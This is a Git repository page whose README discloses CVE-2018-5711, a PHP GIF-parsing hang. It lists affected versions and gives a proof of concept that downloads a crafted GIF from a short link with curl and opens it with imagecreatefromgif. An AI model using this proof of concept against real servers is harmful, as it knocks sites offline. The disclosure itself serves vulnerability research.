admin/0day

History

Mr5m1th 309b5fab8b Merge branch 'master' of https://github.com/Mr5m1th/0day

2018-01-28 13:25:06 +08:00

..

add poc.gif

2018-01-28 13:24:10 +08:00

README.md

Update README.md

2018-01-28 13:22:11 +08:00

README.md

CVE-2018-5711 - Hanging Websites by a Harmful GIF

Author : Orange Tsai

Affected

PHP 5<5.6.33
PHP 7.0<7.0.27
PHP 7.1<7.1.13
PHP 7.2<7.2.1

POC

$ curl -L https://git.io/vN0n4 | xxd -r > poc.gif
$ php -r 'imagecreatefromgif("poc.gif");'

  Infinite loop here...

Reference

http://blog.orange.tw/2018/01/php-cve-2018-5711-hanging-websites-by.html